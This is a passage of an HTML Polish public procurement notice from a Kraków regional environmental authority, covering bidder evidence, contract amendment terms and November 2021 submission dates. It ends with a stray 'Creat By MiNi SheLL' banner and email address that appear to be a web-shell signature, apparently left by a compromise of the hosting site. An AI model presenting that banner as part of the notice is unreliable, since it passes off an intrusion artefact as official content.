Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stron<br/>umowy o Europejskim Obszarze Gospodarczym, a kwalifikacje te zostały uznane na zasadach<br/>przewidzianych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2018 r. poz.<br/>2272).<br/>Uwaga:<br/>pod pojęciem &#34;zamówienia&#34; Zamawiający rozumie umowę.<br/>W przypadku gdy wartość wykazywanych zamówień (umów) jest określona w innej walucie niż<br/>PLN, dokonane zostanie przeliczenie tej wartości na podstawie śr. kursu złotego w stosunku do<br/>walut obcych zgodnie z tabelą kursów śr. NBP z dnia publikacji ogłoszenia o zamówieniu <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia<br/>podmiotowych środków dowodowych, tj.:<br/>a) wykaz wykonanych zamówień, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których zamówienia te zostały wykonane, z<br/>załączeniem dowodów potwierdzających należyte wykonanie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego zamówienia były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – inne dokumenty - zgodnie z treścią załącznika nr 5. do SWZ.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji zamówień wykonywanych wspólnie z<br/>innymi wykonawcami, powyższy Wykaz dotyczy zamówień, w których wykonaniu Wykonawca<br/>bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których<br/>wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>b) Oświadczenie Wykonawcy w zakresie wynikającym z art. 108 ust. 1 pkt 5 ustawy Pzp, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (Dz. U. 2020 poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębna<br/>ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie ofert, oferty częściowej niezależnie od<br/>innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z treścią załącznika nr 6 do<br/>SWZ.<br/>c) Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z treścią<br/>załącznika nr 7 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania, Zamawiający żąda od Wykonawcy przedłożenia wraz z ofertą: odpisu lub<br/>informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia<br/>ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów.<br/>2) Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa w pkt 1, Zamawiający żąda od wykonawcy złożenia wraz<br/>z ofertą:Pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania Wykonawcy. Wymóg powyższy ma zastosowanie odpowiednio do osoby<br/>działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego<br/>1. Oświadczenie wstępne, o którym mowa w art. 125 ust. 1 ustawy Pzp.<br/>Zgodnie z dyspozycją przepisu art. 273 ust. 2 ustawy Pzp, Wykonawca dołączy do oferty:<br/>Oświadczenie wstępne, o którym mowa w art. 125 ust. 1 ustawy Pzp, w celu potwierdzenia<br/>braku podstaw do wykluczenia z postępowania oraz spełniania warunków udziału w<br/>postępowaniu, zgodnie z treścią załącznika nr 3 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4)	W przypadku udzielenia zamówienia Wykonawcom wspólnie ubiegającym się o zamówienie, Zamawiający przed zawarciem umowy może zażądać złożenia kopii umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany mogą dotyczyć:<br/>a) zmiany sposobu lub zakresu wykonywania umowy, w tym także rezygnacja z części<br/>zamówienia, b) rozszerzenia lub ograniczenia obowiązków Wykonawcy, wchodzących w zakres<br/>przedmiotowy umowy,<br/>c) zmiany terminów wykonywania usług lub ich części, a także zmiany terminu wykonania<br/>umowy,<br/>d) zastąpienie zakresu planowanych do wykonania usług innym zakresem usług przy<br/>zachowaniu wymogów jakościowych oraz wymogu zgodności z celem i zasadami realizacji<br/>umowy,<br/>e) zmiany zasad finansowania zadania, w szczególności odnośnie terminów płatności i<br/>możliwości wystawiania faktur częściowych, a także zmiany innych warunków płatności,<br/>f) zmiany wynagrodzenia.<br/>3. Strony zastrzegają możliwość zmiany treści umowy w przypadku zaistnienia następujących<br/>okoliczności:<br/>a) gdy zmiana postanowień umownych jest korzystna dla Zamawiającego, a konieczność<br/>wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili<br/>zawarcia umowy i okoliczności te są niezależne od stron umowy;<br/>b) w przypadku zmiany zasad finansowania zadania wynikających ze zmian w planie<br/>finansowym bądź budżecie Zamawiającego lub też uzgodnień z instytucją finansującą zadanie;<br/>c) w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych<br/>lub zaleceń Instytucji, która przyznała środki na współfinansowanie zamówienia na usługę lub<br/>zmian i wytycznych instytucji przyznających środki na dofinansowanie na nowe projekty;<br/>d) w przypadku wystąpienia „siły wyższej” lub innego zdarzenia losowego; „Siła wyższa”<br/>oznacza wydarzenie zewnętrzne, nieprzewidywalne i poza kontrolą stron niniejszej umowy,<br/>którego skutkom nie można zapobiec, występujące po podpisaniu umowy, a powodujące<br/>niemożliwość wywiązania się z umowy w jej obecnym brzmieniu;<br/>e) w przypadku zmiany stanu prawnego, który będzie wnosił nowe wymagania co do sposobu<br/>realizacji jakiegokolwiek elementu usług;<br/>f) w przypadku gdy z przyczyn technicznych, społecznych, sytuacji pogodowej, nie jest możliwe<br/>wykonanie poszczególnych czynności celem prawidłowej realizacji przedmiotu umowy, lub gdy<br/>od wyniku działania innych podmiotów, nie związanych z realizacją niniejszego przedmiotu<br/>umowy oraz Zamawiającego uzależnione jest wykonanie należycie przedmiotu niniejszej<br/>umowy;<br/>g) w przypadku gdy wymagana jest zmiana związana z koniecznością dostosowania terminu i<br/>sposobu wykonania umowy w związku z okresem w jakim wymagane jest podjęcie<br/>poszczególnych działań, a przy niezmienionych zapisach umowy wykonanie tych działań byłoby<br/>niemożliwe lub wykonane czynności byłyby nieprawidłowo wykonane;<br/>h) w przypadku gdy wymagana jest zmiana wskutek wydłużenia się terminów postępowania<br/>celem uzyskania pozwoleń, uzgodnień, zgód, opinii itp. wymaganych przepisami prawa,<br/>i) w wypadku wystąpienia którejkolwiek ze zmian przepisów tj. :<br/> stawki podatku od towarów i usług,<br/> wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej,<br/>ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym<br/>wynagrodzeniu za pracę,<br/> zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości<br/>stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/> zasad gromadzenia i wysokości wpłat pracowniczych planów kapitałowych o których mowa w<br/>ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;<br/>Warunek wprowadzenia - wniosek jednej ze stron. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://rdos-krakow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-30 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com